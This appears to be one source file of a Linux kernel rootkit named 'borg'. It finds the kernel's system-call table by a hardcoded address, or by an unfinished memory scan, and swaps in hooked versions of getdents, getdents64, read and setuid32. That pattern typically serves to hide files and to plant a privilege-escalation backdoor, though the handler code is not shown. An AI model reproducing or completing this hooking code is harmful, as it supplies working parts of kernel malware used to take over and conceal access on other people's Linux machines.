/**
 * @file hook.c
 * @brief Systemcall hooking functions.
 */

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/errno.h>
#define __KERNEL_SYSCALLS__
#include <linux/syscalls.h>
#include <linux/unistd.h>
#include "borg.h"
#include "hook.h"
#include "getdents64.h"
#include "read.h"
#include "setuid.h"

void **sys_call_table;

/**
 * Find the sys_call_table in memory.
 * @return zero on success and -1 on error.
 */
int syscall_table_find(void)
{
#ifdef SYS_CALL_TABLE
    sys_call_table = (void **) SYS_CALL_TABLE;
    return 0;
#else
#error Currently broken!
    unsigned long *ptr;

    _DEBUG(("syscall_table_find()\n"));
    
    /* Assign a pointer, beware of 4-byte alignment. */
    ptr = (unsigned long *) ((init_mm.end_code + 4) & 0xfffffffc);
    _DEBUG(("start: %p end: %p\n", (void *)init_mm.end_code, (void *)init_mm.end_data));
    
    /* Start searching in the data section. */
    while((unsigned long) ptr < (unsigned long) init_mm.end_data)
    {
	if(ptr == 0xc0418480)
	    _DEBUG(("sys_call_table!!! ptr = %p,%p\n", ptr, *ptr));
	if((unsigned long *)*ptr == (unsigned long *) SYS_CLOSE)
	{
	    _DEBUG(("possible sys_close() at %p\n", ptr));
	}
	ptr++;
    }
    return 0;
#endif
}

int syscall_table_hook(void)
{
    _DEBUG(("%s: sys_call_table is at %p\n", BORG_VERSION, sys_call_table));
    _DEBUG(("%s: sys_getdents64 is at %p\n", BORG_VERSION, sys_call_table[__NR_getdents64]));
    _DEBUG(("%s: sys_getdents is at %p\n", BORG_VERSION, sys_call_table[__NR_getdents]));
    _DEBUG(("%s: sys_read is at %p\n", BORG_VERSION, sys_call_table[__NR_read]));
    _DEBUG(("%s: sys_setuid32 is at %p\n", BORG_VERSION, sys_call_table[__NR_setuid32]));
    HOOK(getdents64);
    HOOK(getdents);
    HOOK(read);
    HOOK(setuid32);
    return 0;
}

int syscall_table_unhook(void)
{
    UNHOOK(getdents);
    UNHOOK(getdents64);
    UNHOOK(read);
    UNHOOK(setuid32);
    return 0;
}
